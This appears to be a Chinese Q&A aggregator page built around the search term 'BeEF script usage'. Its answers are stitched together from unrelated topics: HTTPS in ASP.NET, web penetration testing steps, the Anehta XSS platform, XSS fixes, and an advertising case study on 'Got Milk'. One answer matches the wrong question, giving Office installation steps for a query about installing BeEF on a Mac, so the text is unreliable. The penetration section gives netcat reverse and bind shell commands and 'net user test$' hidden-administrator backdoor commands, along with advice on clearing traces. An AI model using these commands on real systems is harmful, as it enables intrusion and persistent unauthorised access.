beef脚本使用

㈠ beef怎么把网站变成https

https及https的本地测试环境搭建。asp.net结合https的代码实现http网站转换成https网站，以及之后遇到的问题等。

一：什么是https

SSL（Security Socket Layer）全称是加密套接字协议层，它位于HTTP协议层和TCP协议层之间，用于建立用户与服务器之间的加密通信，确保所传递信息的安全性，同时SSL安全机制是依靠数字证书来实现的。

SSL基于公用密钥和私人密钥，用户使用公用密钥来加密数据，但解密数据必须使用相应的私人密钥。使用SSL安全机制的通信过程如下：用户与IIS
服务器建立连接后，服务器会把数字证书与公用密钥发送给用户，用户端生成会话密钥，并用公共密钥对会话密钥进行加密，然后传递给服务器，服务器端用私人密
钥进行解密，这样，用户端和服务器端就建立了一条安全通道，只有SSL允许的用户才能与IIS服务器进行通信。

提示：SSL网站不同于一般的Web站点，它使用的是“HTTPS”协议，而不是普通的“HTTP”协议。因此它的URL（统一资源定位器）格式为“https：//网站域名”。

二：https的本地测试环境搭建

1：win7/windows server 2008R2中 IIS7/IIS7.5 搭配https本地测试环境

2：windows server 2003中IIS6.0 搭配https本地测试环境

三：asp.net 结合 https的代码实现

https是由IIS，浏览器来实现的传输层加密，不需要特意的编码。。。平时怎么在asp.net里面编写代码，就怎么写。

很可能要问，为什么我的站点使用了https之后，用firebug之类的软件查看值提交的时候，还是会显示明文呢？例如，博客园的登陆界面提交。

http：//passport.cnblogs.com/login.aspx

为什么这里还是能看到明文的用户名和密码呢？

原因是因为：https（ssl）的加密是发生在应用层与传输层之间，所以，在传输层看到的数据才是经过加密的，而我们捕捉到的http post的，是应用层的，是还没经过加密的数据。

加密的数据只有客户端和服务器端才能得到明文 客户端到服务端的通信是安全的

支付宝也是https的，但是他的同时也增加了安全控件来保护密码， 以前认为这个只是用来防键盘监听的，其实，看下面http post截获的密码：这个安全控件把给request的密码也先加了密，紧接着https再加次密，果然是和钱打交道的，安全级别高多了：)

四：http网站转换成https网站之后遇到的问题

整站https还是个别的页面采用https？网站的连接是使用相对路径？还是绝对路径？

如果是整站都是https,那么会显得网页有些慢，如果是个别页面采用https，那么如何保证从https转换到http的时候的url的准确性呢？

比如我们用http的时候，网站的头部底部都是用的相对路径，假如你的页面是 http：//aa/index.aspx 你跳转到 https：//aa/login.aspx 这里怎么来跳转？只能把超链接写死

登陆 但是这样的话，你跳转过去之后的页面 ，所有的相对路径都变成了https开头了，这样很影响网站的效率。

虽然使用绝对地址可以解决，但是那样显然不好移植。

下面就是使用第三方的组件，来解决上面的这个问题

步骤

先下载dll文件 http：//code.google.com/p/securityswitch/downloads/list 我选择的是 SecuritySwitch v4.2.0.0 - Binary.zip这个版本

1： 我们来看看测试项目

admin 文件夹，需要登录之后，才能访问。admin里面的 login.aspx 可以访问。整个admin文件夹都需要https访问：

contact.aspx 需要https 访问：

default.aspx 和 view.aspx 采用 http 访问：

链接我们都采用相对路径,并没有写死成 http：//www.xx.com/a.aspx 或者是 https：//www.xx.com/a.aspx。

下面我们开始用SecuritySwith来实现上面的https和http访问的规则。

2：在项目上，添加引用 SecuritySwitch.dll ，并且添加智能提示。

这样，只能提示就有了。

3：然后我们在web.config里面添加设置 。根据IIS的不同，还分为 IIS6+ IIS7.X（经典模式） 以及 IIS7(集成模式) 的不同的配置，这里我们是按照IIS6+IIS7.X的(经典模式)来配置的。

只看看里面的 SSL配置即可：

<?xml version="1.0"?>
<configuration>
<!--SSL配置1开始-->
<configSections>
<section name="securitySwitch" type="SecuritySwitch.Configuration.Settings, SecuritySwitch" />
</configSections>
<securitySwitch baseInsecureUri="http://webjoeyssl"
baseSecureUri="https://webjoeyssl" xmlns="http://SecuritySwitch-v4.xsd"
mode="On">
<!--如果你的http和https仅仅只有一个s的区别，那么这里的base的2个url可以不写，那为什么还要搞这2个url呢？因为比如
你的 baseInsecureUri (基本不安全网址) 是 http://www.qq.com
而你的 baseSecureUri (基本安全网址) 是 https://safe.qq.com
然后这个时候你访问一个需要https的页面，假如是 login.aspx?return=joey
假如你是通过http://www.qq.com/login.aspx?return=joey访问的,那么这个
页面会跳转到http://safe.qq.com/login.aspx?return=joey
-->
<paths>
<add path="~/contact.aspx"/>
<add path="~/admin/login.aspx"/>
<add path="~/admin" />
<!--这里的admin因为不仅是 admin 文件夹，而且还包含类似的 adminNews.aspx adminQQ.aspx 页面"-->
<!--但是如果是 ~/admin/ 就是专门指admin文件夹-->
</paths>
</securitySwitch>
<!--SSL配置1结束—>
<appSettings />
<system.web>
<compilation debug="true">
</compilation>
<!-- 内置票据认证 start-->
<authentication mode="Forms">
<forms name="mycook" loginUrl="admin/login.aspx" protection="All" path="/" />
</authentication>
<!--SSL配置2 如果是 IIS <= 6.x, IIS 7.x + 经典模式-->
<httpMoles>
<add name="SecuritySwitch" type="SecuritySwitch.SecuritySwitchMole, SecuritySwitch" />
</httpMoles>
<!--SSL配置2结束-->
</system.web>
<!--SSL配置2 如果是IIS7.X + 集成模式-->
<!--<system.webServer>
<validation ="false" />
<moles>
--><!-- for IIS 7.x + 集成模式 --><!--
<add name="SecuritySwitch" type="SecuritySwitch.SecuritySwitchMole, SecuritySwitch" />
</moles>
</system.webServer>-->
<!--如果是IIS7.X+集成模式 SSL配置2 结束—>
</configuration>

4： 由于用到了内置票据认证，所以要在 Global.asax添加以下代码：

protected void Application_AuthenticateRequest(object SENDER, EventArgs e)
{
if (HttpContext.Current.User != null)
{
if (HttpContext.Current.User.Identity.IsAuthenticated)
{
if (HttpContext.Current.User.Identity is FormsIdentity)
{
FormsIdentity id = (FormsIdentity)HttpContext.Current.User.Identity;
FormsAuthenticationTicket tiecket = id.Ticket;
string userData = tiecket.UserData;
string[] roles = userData.Split(',');
HttpContext.Current.User = new System.Security.Principal.GenericPrincipal(id, roles);
}
}
}
}

5： 后台登陆界面 admin/login.aspx：

<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="login.aspx.cs" Inherits="web.admin.login" %>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title></title>
</head>
<body>
<form id="form1" runat="server">
用户名：<asp:TextBox ID="txtUser" runat="server"></asp:TextBox><br />
密码:<asp:TextBox ID="txtPass" runat="server"></asp:TextBox><br />
记住用户名：<asp:CheckBox ID="chkUsername" runat="server" Checked="true"/>
<br />
<asp:Literal ID="litResult" runat="server"></asp:Literal>
<br />
<asp:Button ID="btnSubmit" runat="server" Text="提交" onclick="btnSubmit_Click" />
</form>
</body>
</html>

后台登陆界面 cs admin/login.aspx.cs：

using System;
using System.Collections.Generic;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.Security;
namespace web.admin
{
public partial class login : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
}
protected void btnSubmit_Click(object sender, EventArgs e)
{
string username = txtUser.Text;
string pass = txtPass.Text;
bool ischeck=chkUsername.Checked;
if (username=="admin" && pass=="admin")
{
SaveLogin(username, ischeck);
}
}
private void SaveLogin(string username, bool ischeck)
{
HttpCookie cook;
string strReturnURL;
string roles = "admin";//将用户的usernameid,保存到cookies，身份是 admin 身份
//要引用 using System.Web.Security;
FormsAuthenticationTicket ticket = new FormsAuthenticationTicket(
1, username, DateTime.Now, DateTime.Now.AddMinutes(30), ischeck, roles);
cook = new HttpCookie("mycook");//对应webconfig里面的 验证里面的 forms name="mycook"
cook.Value = FormsAuthentication.Encrypt(ticket);
Response.Cookies.Add(cook);
strReturnURL = Request.Params["ReturnUrl"];
if (strReturnURL != null)
{
Response.Redirect(strReturnURL);
}
else
{
Response.Redirect("default.aspx");
}
}
}
}

㈡ 苹果系统怎么安装beef xss

office of MAC 文件大小的1个多G， 后缀名是*.iso。需要你在网上下载。 用U盘拷到你的MAC上。 双击打开MAC上的"Microsoft Office 2011.iso"，按步骤一步步安装就可以了。 安装完成后的，MAC最下面一栏里就会出现W/P/X/0几个图标的。说明你已经完装好了，可以使用了。

㈢ web渗透是什么

Web渗透测试分为白盒测试和黑盒测试，白盒测试是指目标网站的源码等信息的情况下对其渗透，相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透，以下所说的Web渗透就是黑盒渗透。

Web渗透分为以下几个步骤，信息收集，漏洞扫描，漏洞利用，提权，内网渗透，留后门，清理痕迹。一般的渗透思路就是看是否有注入漏洞，然后注入得到后台管理员账号密码，登录后台，上传小马，再通过小马上传大马，提权，内网转发，进行内网渗透，扫描内网c段存活主机及开放端口，看其主机有无可利用漏洞（nessus）端口（nmap）对应服务及可能存在的漏洞，对其利用（msf）拿下内网，留下后门，清理痕迹。或者看是否有上传文件的地方，上传一句话木马，再用菜刀链接，拿到数据库并可执行cmd命令，可继续上大马.........思路很多，很多时候成不成功可能就是一个思路的问题，技术可以不高，思路一定得骚。

信息收集

信息收集是整个流程的重中之重，前期信息收集的越多，Web渗透的成功率就越高。

DNS域名信息：通过url获取其真实ip,子域名(Layer子域名爆破机)，旁站(K8旁站，御剑1.5)，c段，网站负责人及其信息（whois查询）

整站信息：服务器操作系统、服务器类型及版本(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型；

网站常见搭配为：

ASP和ASPX：ACCESS、SQLServer

PHP：MySQL、PostgreSQL

JSP：Oracle、MySQL

敏感目录信息（御剑，dirbust）

开放端口信息（nmp）

漏洞扫描

利用AWVS,AppScan,OWASP-ZAP,等可对网站进行网站漏洞的初步扫描，看其是否有可利用漏洞。

常见漏洞：

SQL注入

XSS跨站脚本

CSRF跨站请求伪造

XXE(XML外部实体注入)漏洞

SSRF(服务端请求伪造)漏洞

文件包含漏洞

文件上传漏洞

文件解析漏洞

远程代码执行漏洞

CORS跨域资源共享漏洞

越权访问漏洞

目录遍历漏洞和任意文件读取/下载漏洞

漏洞利用

用工具也好什么也好对相应漏洞进行利用

如：

Sql注入（sqlmap）

XSS（BEEF）

后台密码爆破（burp）

端口爆破（hydra）

提权

获得shell之后我们权限可能很低，因此要对自己提权，可以根据服务器版本对应的exp进行提权，对于Windows系统也可看其补丁对应漏洞的exp进行提权

内网渗透

首先进行端口转发可用nc

nc使用方法：

反向连接

在公网主机上进行监听：

nc-lvp 4444

在内网主机上执行：

nc-e cmd.exe 公网主机ip4444

成功之后即可得到一个内网主机shell

正向连接

远程主机上执行：

nc-l -p 4444 -t -e cmd.exe

本地主机上执行：

nc-vv 远程主机ip4444

成功后，本地主机即可远程主机的一个shell

然后就是对内网进行渗透了，可以用主机漏洞扫描工具（nessus,x-scan等）进行扫描看是否有可用漏洞，可用msf进行利用，或者用nmap扫描存活主机及开放端口，可用hydra进行端口爆破或者用msf对端口对应漏洞得到shell拿下内网留后门

留后门

对于网站上传一句话木马，留下后门

对于windows用户可用hideadmin创建一个超级隐藏账户

手工：

netuser test$ 123456 /add

netlocalgroup administrators test$ /add

这样的话在cmd命令中看不到，但在控制面板可以看到，还需要改注册表才能实现控制版面也看不到，太过麻烦，不多赘述，所以还是用工具省心省力。

㈣ anehta 这是什么意思

Anehta -- 新一代的web攻击平台

为什么叫：Anehta ?
因为“雅典娜”的名字是 ：athena ，但是这个名字已经被sourceforge上的某人抢了，所以按照“刺氏命名法”，把“athena”反过来，本项目正式命名为： Anehta，中文发音：“阿内塔”
Anehta 项目是做什么的？
简单来说，你可以理解为 AttackAPI + BeEF。 但是Anehta 绝对没有这么简单，因为我实现了很多特有的机制，使得Anehta更加强大以及更加容易扩展。
没听过什么AttackAPI，还是不知道Anehta是做什么。
更通俗来说，Anehta 就是一个跨站脚本攻击（xss）的利用平台。
Anehta是用什么语言开发的，对系统有什么要求？
由于在一开始就考虑到了通用性、跨平台性、跨浏览器、稳定性、易扩展性，所以Anehta在这方面做的是非常好的。anehta是基于javascript 和 PHP开发的。其中部分用到了 jQuery 框架，虽然anehta 可以独立于jQuery存在，但是考虑到引入jQuery 后，可以大大降低开发模块的成本，所以还是保留了。使用jQuery的另外一个好处就是跨浏览器，因为jQuery 本身是跨浏览器的，所以anehta也很容易做到这点.
使用PHP是因为PHP是当今使用最为广泛的脚本语言之一。(其实有个很不可告人的原因是因为大部分肉鸡都是PHP的吧，嘿嘿，anehta不需要任何perl、python、ruby等脚本支持)

㈤ " CHECK IT OUT " 到底是啥意思啊 好象挺时髦的!

“CHECK IT OUT”在黑人说唱即rap里面一般可以理解为：听我说！仔细听一听！听我说！在日常使用中，“check it out”可以翻译为：仔细讨论、查看清楚、仔细查看核对。

例如：Maybe we ought to go down to the library and check it out. 或许我们应该去趟图书馆，查个明白。 Sure. I will reply to you as soon as I check it out. 当然了，我查看后马上给你回复。

(5)beef脚本使用扩展阅读

1、check 英式发音 [tʃek]； 美 式发音[tʃɛk] 可以翻译为：vt. 检查，核对;制止，抑制;在…上打勾 vi. 核实，查核;中止;打勾;[象棋]将一军 n. <美>支票;制止，抑制;检验，核对

2、《Check it out》还是美国着名饶舌创作歌手Nicki Minaj和Will.I.Am合作的一首歌曲。作为Nicki的Pink Friday第二支单曲打出。

参考资料来源：网络--《Check it out》

㈥ 我做的网站被漏洞检测说是有什么xss跨站脚本漏洞，怎么修复啊，哪位大侠帮看看！！

你这个页面我没看出来有xss啊，倒是有可能有sql注入漏洞。Title变量要过滤一下啊，要不用户可能会修改Title的内容，比如插入一个单引号，后面跟上自己的sql语句，这样会导致查到一些不该看到的数据库内容，引发注入漏洞。所以，要过滤一些用户提交的数据，把特殊字符全滤掉，网络一些啊asp防注入，有源码的。

xss，假设我是攻击者，我把提交数据的一个变量修改为‘aaaaaaaaaaaa’（post或则get提交的都可以，因为你是request接收的），然后看页面中回显‘aaaaaaaaaaaa’的位置。如果出现了，我可以尝试修改一下加入“<>”等，破坏掉你的html结构，如果可以破坏，那么我就可以插入javascript代码“<script src=...></script>”。盗取用户的cookies（所以cookies最好只用httponly），结合beef甚至操作用户的浏览器（权限和功能很低的，别想多了）。
综上所述，你写源码时，必须要检查所有用户可以修改和提交的数据（包括cookies等http头里面的），然后在输出点做好编码。输入与输出控制好了可以减免很多麻烦。
还可以使用安全宝、知道创于等公司提供的云waf服务，这样用户提交的数据会由他们检测，并且给你做好了cdn加速。注意的是，不要把你真实的ip暴露在网上。有的人只做www.test.com的解析，没有做test.com的解析，导致真实ip暴露在网上。
或者使用一些开源的cms，asp的我不了解，php的我知道有wordpress，代码写的很不错了，只要你定期更新版本，不乱下载一些插件（插件都是别人提交的，编程水平不一定很好所以），一般不会出什么大的漏洞。插件也要定期更新。
防止旁站，找主机服务商时要注意（找大的和好的），亚马逊这样的，每个站的权限都是控制的很死的，所以很难提权。
至于社工，安全是一种意识，慢慢培养吧。我了解的就这些了，希望能对你有帮助。

㈦ 一个完整的渗透测试流程，分为那几块，每一块有哪些内容

包含以下几个流程：

信息收集

第一步做的就是信息收集，根据网站URL可以查出一系列关于该网站的信息。通过URL我们可以查到该网站的IP、该网站操作系统、脚本语言、在该服务器上是否还有其他网站等等一些列的信息。

漏洞探测

当我们收集到了足够多的信息之后，我们就要开始对网站进行漏洞探测了。探测网站是否存在一些常见的Web漏洞，比如：SQL注入 。

漏洞利用

探测到了该网站存在漏洞之后，就要对该漏洞进行利用了。不同的漏洞有不同的利用工具，很多时候，通过一个漏洞我们很难拿到网站的webshell，我们往往需要结合几个漏洞来拿webshell。

内网渗透

当我们能跟内网主机进行通信后，我们就要开始进行内网渗透了。可以先使用nmap对内网主机进行扫描，探测在线的主机，并且探测其使用的操作系统、开放的端口等信息。

内网中也有可能存在供内网使用的内网服务器，可以进一步渗透拿下其权限。

痕迹清除

达到了目的之后，有时候只是为了黑入网站挂黑页，炫耀一下；或者在网站留下一个后门，作为肉鸡，没事的时候上去溜达溜达；亦或者挂入挖矿木马。

撰写渗透测试保告

在完成了渗透测试之后，就需要对这次渗透测试撰写渗透测试报告了。明确的写出哪里存在漏洞，以及漏洞修补的方法。以便于网站管理员根据我们的渗透测试报告修补这些漏洞和风险，防止被黑客攻击。

㈧ AP在加州牛奶加工者实施的“GOT MILK”的作用他们做了什么调查，是如何收集资料的谢谢！！

主题5：广告专业化的过程:AP制

兴起时，影响互联网的“信任度”是收到质疑的。03年的SARS，让人们看到互联网上的“小道消息”有一定的信任度。
户外广告也在SARS时得到发展。

一、AP制的兴起背景
英国最早设立AP部门的两家广告代理公司分别是Stanley Pollitt创始的BMP（Boase Massimi Pollitt）和Stephen King主管下的JWT（J. Walter Thompson）。

1. 广告主自身设置独立的营销部门，对广告效果的要求日益严格
• 在六十年代以前，广告主的市场营销计划通常是由广告公司来制定。
• 当时广告公司的市场营销部门的主要任务是收集并分析各种原始或二手的调查数据，为广告主撰写营销计划书，包括建议开展更多的调查研究，负责新产品或品牌开发的策划事务等。
• 由于对受委托的企业缺乏长期的接触和深入的了解，所以当时的营销计划书还都着眼于宏观方面，忽视企业盈利方式和前景等微观方面。在这种营销计划书指导下的广告活动缺乏必要的有效性的保证。
• 广告主逐渐意识到这一点，并开始设立自己的营销部门，由自己来完成营销计划的设计，广告公司的营销部门只充当偶尔的顾问。
• 在市场激烈竞争的情况下，广告主要求利润最大化，这一点反映在广告上，就体现为要求所作的广告必须有效果（effectiveness），即要求广告对消费者的心理特征或购买行为必须产生有利于广告主的影响，而不是单纯地追求广告活动执行的效率（efficiency），如广告活动的持续时间、简单地测量广告到达率、回忆率等。与效率相比，效果对于广告主来说更实在，更利于企业的长期发展。

2、消费者在营销过程中地位的提升
• 经过二战后十几年的发展，商品同质化程度日益严重，市场竞争愈演愈烈，消费者在营销中的重要地位已为众多业内人士所接受。
• 广告代理公司开始将其目光转移到了消费者身上，于是出现了诸如消费者洞察、消费者对广告的反应、消费者消费广告等一系列理论学说
• AP制的产生就是广告代理公司对消费者在营销过程中的地位提升所做出的反应。
• Rod Meadows在ADMAP1983年的7/8合刊中发表了一篇名为“They Consume Advertising Too”的文章。
• 在文中，他提出了消费者消费广告的观点。他认为已经有越来越多的人在根据自身的喜好去主动地赏析广告，把广告作为一种商品进行消费。这部分人希望优秀的广告能够吸引他们的注意力，能够以某种形式来刺激他们，给予他们娱乐，并与他们自身的兴趣相吻合。
• 这一点在英国广告业的发展史上表现得最为突出。英国人的保守闻名世界，因而当1954年10月16第一支商业电视广告进入英国家庭时，上至议员，下至平民百姓对此大肆抨击。然而经过十几年自身的努力，同时在美国伯恩巴克（William Bernbach）于五六十年代倡导的创意革命的影响下，英国人对广告的态度发生了惊人的变化，在英国，民众对广告认可的程度超过了美国，与电影、电视并行成为英国三大流行文化。这种氛围的形成为AP在英国的滋生提供了良好的环境。
• 消费者消费广告习惯的形成，及由此造成的消费者对广告创意要求的日益苛刻，给广告代理公司中的创意部门施加了一定的压力。
• 在这种情况下，创意人员虚心采纳多种创意手段，从其他部门人员寻求信息或创意的灵感，而原来营销部门量化的统计结果往往很难满足创意部门对创意的渴求。
• AP部门的一个重要任务就是协调广告公司中各部门之间的关系，创造与创意部门人员共事的良好氛围，并将其汇总的有关商品、市场和消费者信息，通过简洁、明了、富有启迪的方式传递给创意人员，为其创意灵感的产生创造条件。

3、市场调查公司的兴起，形成对广告代理公司强有力的竞争
• 矛盾：由于技术手段的发展，无论是广告主的营销部门，还是市场调查公司，抑或是广告代理公司的营销部门，都有能力获得数量更多、质量更好的市场信息数据。
• 与广告代理公司中的营销部门相比，市场调查公司中的数据分析人员地位更高，待遇更好，所面临的行业内竞争要少一点，更易发挥其专业特长。一批优秀的数据分析人员离开原来供职的广告公司，投身于吃香的调查公司。
最初的市场调查是由广告公司完成的
4、困境中广告代理公司的反应及其内部的权力制衡
• 广告主营销部门的设立及营销手段的提高，使广告代理公司的营销部门相形见绌，同时客户主管也失去了强有力的营销计划支持；
• 消费者反应、新广告模型及消费广告等一系列理论的提出，使得原来营销部门的传统技术手段略显过时，致使创意部门倍受压力；
• 市场调查公司的蓬勃发展和挖人行为，对已处于困境中的广告公司无疑是雪上加霜。
• 这一切都表明广告代理公司传统的机构设置亟待调整。
• 原来的营销部门必须被撤换，而取代它的新的部门：
• 客户主管提供说服客户的理由，
• 又能为创意部门补充创意灵感，
• 同时还要区别于市场调查公司，代表消费者真实感受。

二、AP制的具体内容
1、平时积累阶段
• 从事AP工作的人被称作account planner。一个优秀的planner必须具备以下素质：
• 与各种人巧妙沟通的交流才能；
• 分析和运用数据的才能；
• 对策略的宏观把握能力
• 对市场信息、消费者反应及创意灵感的敏锐的洞察力。
• 而这一系列能力的形成，则要依赖于平时planner不断的学习和有意识的培养。

2、策略策划阶段（strategic planning）
• 参加客户为广告代理公司的客户部门而召开的有关产品的定向说明会
• 经常与客户主管一起与客户进行有关策略方面的沟通
• 查阅诸如尼尔森等调查公司的相关产品或行业的调查报告
• 召开专题组座谈（focus group），调查消费者对该产品及相关产品的认知情况、购买行为及消费习惯等
• 帮助客户制定或影响其市场营销策略。
• 实施AP制的广告代理公司通过其掌握的消费者反应（response），试图影响广告主营销计划的宏观方面，即策略部分，从而避免由于策略失误而造成的巨大损失。

3、创意简报阶段（creative briefing）
• 所谓创意简报（creative brief），指的是在account planner汇总有关客户、消费者及市场信息之后，再对此进行精简，生成一个简洁明了，富有启迪的建议，然后再通过一系列的会议，由account planner向创意人员以巧妙地方式传递这一建议。这一过程统称为创意简报阶段（creative briefing）。
一份好的创意简报是沟通策略性思考和成功广告的一座重要桥梁，它必须同时包含三种目标：
1. 它必须能够使创意人员头脑中对该广告所要实现的目标有一个准确清晰的框架；
2. 它必须能向创意人员描述该广告目标消费群的真实的心理特征和消费行为。这一描述既要掌握该目标消费群的总体特征，又要细致入微到单个目标消费者的具体的生活经历。这一描述不是定量的、呆板的、纯粹理性的，而应该是定性的、创新的、深入到消费者感性层面的；
3. 创意简报中所含的信息必须能够把消费者和广告目标联系起来，具有很强的指向性。

在生成创意简报时，切忌把所有信息不加筛选，全部放入创意简报中去，而应该有针对性地进行选取。以下几个问题可以作为生成创意简报的基础：
• 究竟为什么我们必须做广告？
• 我们的广告想要达到什么目标？
• 广告的目标消费群是哪部分人群？
• 对于这些人，我们到底了解多少？
• 我们需要沟通的主题是什么？
• 策划该主题的最佳方式是什么？
• 如何知道我们所做的正确与否？

4、创意开发研究阶段（creative development research）
• 创意开发研究一词是由Jon Steel提出来的，实际上就是指对创意雏形的检验。但由于考虑到该阶段的侧重点在于了解或预测消费者对该创意雏形的反应，了解消费者做出这种反应的原因，力图进一步完善该创意，于是就运用了creative development research这一表达方式。所谓的创意雏形是指粗略的创意点子，而不是马上就可以拿去播放或刊登的广告成品。这么做主要还是基于成本上的考虑。
• 创意开发研究的具体做法是选取能够代表目标消费群的样本，以专题组座谈（focus group）等定性研究方法，通过座谈主持人（moderator）的精心协调，捕捉在座谈过程中消费者下意识流露出来的对创意雏形的真实反应，并据此及时修改或完善该创意。

AP案例分析：
加州牛奶加工者顾问董事会实施的“Got Milk”一案。
背景分析：
• 加州牛奶消费量的大幅度下降；
• 成立加州牛奶加工者顾问董事会；
• 与Goodby, Silvertein & Partners的接洽。
加州牛奶消费量的大幅度下降
• 1980年，加州牛奶的人均年消费量为30加仑（一加仑=4.5升），1993年下降到24.1加仑，整整下降20%。
• 但同期人口稳定增长，抵消了人均消费量的降低，牛奶消费在总量上保持稳定。
• 80年代后期，人均消费下降幅度过大，导致牛奶市场开始萎缩。1992-1993单单一年之内，下降3.6%。
加州牛奶加工者顾问董事会
• 以往的广告活动并未奏效；
• 成立加州牛奶加工者顾问董事会（Carlifornia Fluid Milk Processors’ Advisory Board→CFMPAB），决定采取新一轮的广告活动；
• 具体实施：从销售每加仑牛奶的所得中扣除3美分作为基金；广告活动的期限是2年，若不成功，董事会将自动解散；
• 聘请Jeff Manning作为该董事会的执行经理。
Jeff Manning个人简介
• 具有丰富经验的广告人，曾经在智威• 汤逊，麦肯Erikson, Ketchum 任职；
• 策划过很多食品的广告活动，其中包括egg, beef, banana 等;
• 相关的经历，与广告公司的默契配合，在这次活动中起了重要的作用。
与Goodby,Silvertein&Partners 的接洽
• 第一年的广告预算是2500万美元，但要求广告效果显着，作用迅即；
• 公司内部意见不一致，因为当时广告业的普遍意见是牛奶客户如同鸡肋，弃之可惜，食之无味，认为给牛奶做广告是注定要失败的。公司不应该介入这件事情。
开放性的定向说明会（a wide-open brief）

• 现状的陈述；
• 二手数据的获得及应用；
• 广告主明确阐述所要实现的目标。

二手数据的获得及应用（Gallup）
• Gallup在全国范围内对牛奶本身及牛奶消费行为的长期调查；
• 分析上述资料，得出牛奶消费量下降主要基于以下三个原因：
• 1. 病态地介意牛奶中的脂肪含量；
• 2. “妇女婴儿食品”，小时候妈妈的教诲kids→adolescence→althood;
• 3. 与Coca-Cola,Pepsi牛奶的定位和诉求点老套，缺乏新意。
以往广告的弊端和效果
• 诉求点：牛奶对你的健康有好处；
• 诉求方法：俊男靓女，白皙的皮肤，洁白的牙齿，健壮的肌肉；
• 总之，牛奶是一种健康的饮料。

• 在改变消费者认知态度的方面，确实起了一定的效果。牛奶是有益的。
• 支持“我应该喝更多的牛奶”的比例，从1982年40%上升到1992的52%。
广告主所要实现的目标
• Manning认为有时候形象根本不能代表什么，尤其是对于牛奶这类商品而言。形象≠销售；
• 广告活动的重点不是改变牛奶的形象，而在于改变消费者行为；
• 只要牛奶的销售量能提高，怎么干都行，广告中并不一定要出现牛奶。

策略策划阶段(strategic planning)
• 广告目标受众的重新确立；
• 诉求点的转换；
• 诉求方法的创新；
• 媒介策划的灵活运用
01. 广告目标受众的重新确立
• 两个市场原理：①20：80的法则，即市场中20%的消费者贡献80%的销售额；②向经常使用某产品的消费者做广告，其效果要比向偶尔使用或从未使用过的消费者做广告要大得多。
• CFMPAB对牛奶消费习惯的研究表明：
02. 诉求点的转换
• 诉求对象的重新确立要求转换诉求点；
• 然而，牛奶除了健康之外，还有什么呢？
• 调查表明，人们一般很少单独饮用牛奶，牛奶只是对其他食物的补充而已。这些食物都有麦片、各种糕点、小甜饼、三明治、花生油等。
• “____ and milk”, “milk and ____”；
• Focus group: ①牛奶→联想→牛奶
• Focus group：②巧克力、小甜饼、糕点
• 小结：
①食物可以用来产生欲望，而且不仅仅局限在麦片；牛奶本身并不能做到这一点；
②在巧克力等美食面前，若没有牛奶，食物贬值，气氛遭到破坏，人们反应过激；
03. 诉求方法的创新
• 剥夺策略（a deprivation strategy），也称违背实验法。在一段时间内禁止使用生活中经常用到的商品，来制造不同寻常的情况，根据在此情况下消费者的行动和感受，发现商品对消费者的意义，并且对此进行调查。在调味料、饮料等商品经常使用这种方法进行调查。
• 文案撰写：Have you got enough milk? →Got milk?
• 视觉设计：麦片、咖啡太普通，令人馋涎欲滴、被咬掉一口的巧克力、小甜饼或三明治更具冲击力。
• 电视广告作品的环境：调查表明，88%的牛奶都在家消费，所以广告情节发生的背景应在家中——餐桌、厨房、冰箱。
创意开发研究(creative development research)
• 创意开发研究一词是由Jon Steel提出来的，实际上就是指对创意雏形的检验。其侧重点在于了解或预测消费者对该创意雏形的反应，了解消费者做出这种反应的原因，力图进一步完善该创意。
• 向座谈对象展示相关图片，以及电视广告的脚本(Alexander Hamilton & Aaron Burr)。
• 跟踪电话采访座谈对象对创意雏形的印象。
04. 媒介策划的灵活运用
• 时段的精心选择：牛奶在家中的特定时间消费，如早晨，上午、下午和晚上吃点心的时间；
• D:\所有文件\所有广告影视资料\影视图片\got ml.MPG

广告活动的效果及扩张
• 多种媒介的综合使用：①电视（Aaron Burr篇, Couple篇, Baby and cat篇）、杂志；②高速公路出口处的路牌、食品店或超市的购物车及出售相应食物的地方；③促销活动，与其他品牌合作：雀巢、Mother’s Cookies、General Mills、Kraft General Foods。
• 销售量大幅度上升：经常消费牛奶的家庭由1993年70%上升到1995年的74%；在一天中使用牛奶的次数由1994年10月的3.9次上升为1995底的4.3次；94年销售量比93年增加了0.7%,而94年之前销售量持续下降，93年比92年下降3.6%。
• DMI全美乳制品生产者联合会购买了这次广告活动的版权，并把品牌延伸到服装、玩具、杯子，成为大众文化的一部分。

总结：
• 消费者洞察：深入到消费者生活中去，从而获得消费者对产品的真实感受；
• 与客户部、创意部互助合作，相互之间界限并不十分清楚；
• 定性研究和定量研究的创造性运用。

三、AP制的意义
1、在实际操作方面AP制有效地缓解了广告公司所面临的压力
• 客户部门由于有了AP部门的协助，以及策略策划能力的提高，从而更易留住客户，吸引新客户，有利于广告公司拓展新的业务。
• 创意部门因为AP部门在生成创意摘要和创意开发研究两个阶段的重要参与，其创意视野大大开阔，并与营销策略紧密联系，避免这两个方面发生脱钩的现象，从而使得广告变得更为有效。
• 在与营销调查公司竞争这一方面，由于设置AP部门的广告代理公司注重的不单单是数据的采集，而是对各种数据进行分析并灵活应用到广告流程中来。AP制的广告公司由此与市场调查公司区别开来，并在一定程度上形成了互相协作的关系。

2、理想的三角模式
• AP出现以前，广告代理公司一般是客户部门、创意部门、营销部门、媒介部门的协作关系。
• 而当广告公司整合营销部门和媒介部中的策划人员成立一个新的部门之后，广告代理公司内部的主要框架就成了客户部门、创意部门和AP部门的三角模式。这样一来，他们三者之间既相辅相成，又相互牵制、监督。
• 客户主管与AP人员共同商定营销策略的设计。虽然营销策略的最终决定权在客户部门，但代表消费者的AP时刻监督客户部门，以防止其不顾消费者内心感受，而妄自制定营销策略。
• 创意人员和AP人员在创意开发阶段也相互协作：AP人员一方面要为创意人员最大限度地提供创意灵感，而另一方面又要检测创意雏形，对其拥有通过或否决的权力，在一定程度上约束着创意人员的想象力，以免创意人员过度追求广告的艺术性，而忽视广告的科学性和商业行为的本质。
• 客户部代表本公司经常与广告主打交道，来自广告主和广告公司双方面的压力颇使客户部必须兼顾双方的利益，遵守商业运作规则——利益至上，因此客户部代表务实（practicality）的品质。
